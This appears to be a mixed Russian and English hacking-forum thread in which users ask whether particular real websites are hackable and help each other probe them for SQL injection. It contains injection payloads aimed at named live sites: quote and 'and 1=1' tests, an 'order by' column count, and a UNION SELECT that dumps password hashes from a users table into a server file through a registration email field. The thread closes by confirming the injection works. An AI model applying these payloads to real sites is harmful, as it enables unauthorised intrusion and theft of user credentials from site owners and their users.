InvisibleSM, Прорекламирую мою тулзу тебе в помощь =\

https://forum.antichat.ru/thread79411.html

hi

sorry for english

is this hackable

http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43&PostID=4186769

waitting>>>>>>>>>>>

http://forums.microsoft.com/SamVaad/ShowPost.aspx?siteid=43'&PostID=4186769 hmmmm
it may well be that filtration ' ! Not good!!!

-------------------------------------------
No man!!!it cannot be said : this unhackable! Search some different ways!!!

блин забыл самое главное написать, там нет выводимых полей там бага в мейл поле при регистрации поэтому только аут файл могу сделать

во что пишу

' union select passhash from users where id=1 into outfile '/tmp/1.txt'/* -- @bla.ua

а прочитать терь как, хз

на ошибки гуглил, нету

Народ помогите разобрать что то непонимаю что к чему http://www.viper-shop.dk/category.php?id=180'

Ругается что не правильный синтаксис и все тут. Уже все перепробовал. В чем ошибка?

http://www.viper-shop.dk/category.php?id=180+and+1=1

интересно что же ты перепробовал... Не знаешь - не лезь или учись...

чтото я не понял сути поста .. может мне тоже учится пойти надо...
кол-во колонок, обычно так ищут ..
http://www.viper-shop.dk/category.php?id=180'+order+by+16/*
так что делаем вывод, 15 колонок .. можно в ошибке посмотреть кол-во колонок, но там не то колво, ибо c.*
вывода не добился..
лучше поискать на сайте ещё скули, возможно проще будет, ну или эту поковырять ещё ..

ну тогда зайди и посмотри вывод и отличается чем-то?
и вообще с чего вдруг взяли что там sql-inj?

вот эти два вывода разные:

инъекция там есть.